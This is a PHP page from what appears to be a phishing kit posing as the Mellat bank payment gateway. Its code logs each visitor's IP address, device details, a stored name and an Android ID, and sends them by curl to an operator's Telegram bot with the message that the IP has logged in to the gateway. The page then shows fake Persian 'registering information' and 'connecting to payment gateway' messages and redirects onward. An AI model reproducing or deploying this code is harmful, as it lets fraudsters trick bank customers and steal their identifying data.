
<?php
date_default_timezone_set('Asia/Tehran');

include_once 'information.php';


$ip = $_SERVER['REMOTE_ADDR'];
$Device = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[4],")");
$Device2 = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[3],")");
$datename = file_get_contents("../data/fullname_ip/$ip.txt");


$link = "https://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];

$url_components = parse_url($link);
parse_str($url_components['query'], $params);

$androidid = $params['androidid'];


$des = "  
ورود موفق آيپی $ip به درگاه پرداخت ملت✅  

 $Device | $Device2

t.me/SpecificAccount
";

    $KeyBoard12 = json_encode(['inline_keyboard'=>[
                [['text'=>"Kasrmoje - false",'callback_data'=>"rerhywh"]],
    ]]);
    if (!empty($yourtoken) && !empty($Chatid))
    $send = "https://api.telegram.org/bot" . $yourtoken . "/sendMessage?chat_id=" . $Chatid . "&text=" . urlencode($des) . '&parse_mode=HTML' . '&reply_markup=" . $KeyBoard12 . "' ;
    $params = [
'chat_id' => $Chatid,
'reply_markup' => $KeyBoard12,
'text' => $des,
'parse_mode' => 'HTML'
];
    $website = "https://api.telegram.org/bot" . $yourtoken;
    $ch = curl_init($website . '/sendMessage');
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $result = curl_exec($ch);
    curl_close($ch);


?>

<!DOCTYPE html>
<html

    <meta name="msapplication-TileColor" content="#2d2a26">
    <meta name="theme-color" content="#D50057">
    <meta name="msapplication-navbutton-color" content="#D50057">
    <meta name="apple-mobile-web-app-status-bar-style" content="#D50057">
    <meta name="description" content="">
    <meta name="keywords" content="">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<meta charset="utf-8" />
<head>

<style>
@font-face {
    font-family: myFont;
    src: url('../file/fonts/DanaFaNum-ExtraBold.woff2');
}
body {
    font-family: myFont;
}

  h1 {
   text-align: center;
   color: #D50057;
  }
        .center {
            text-align: center;
            font-size: 40px;
               color: black;
        }
</style>
<body>

<center>
<img src="file/ZKZg.gif" width="200" height="200">


</center>
<br>


<center>
    <div id="message" class="center">در حال ثبت اطلاعات</div>

</center>



<meta http-equiv="refresh" content="5.5; URL=../goto">

    <script>
        setTimeout(function() {
            document.getElementById("message").innerHTML = "اتصال به درگاه پرداخت";
        }, 3000);
        
    </script>


</body>
</html>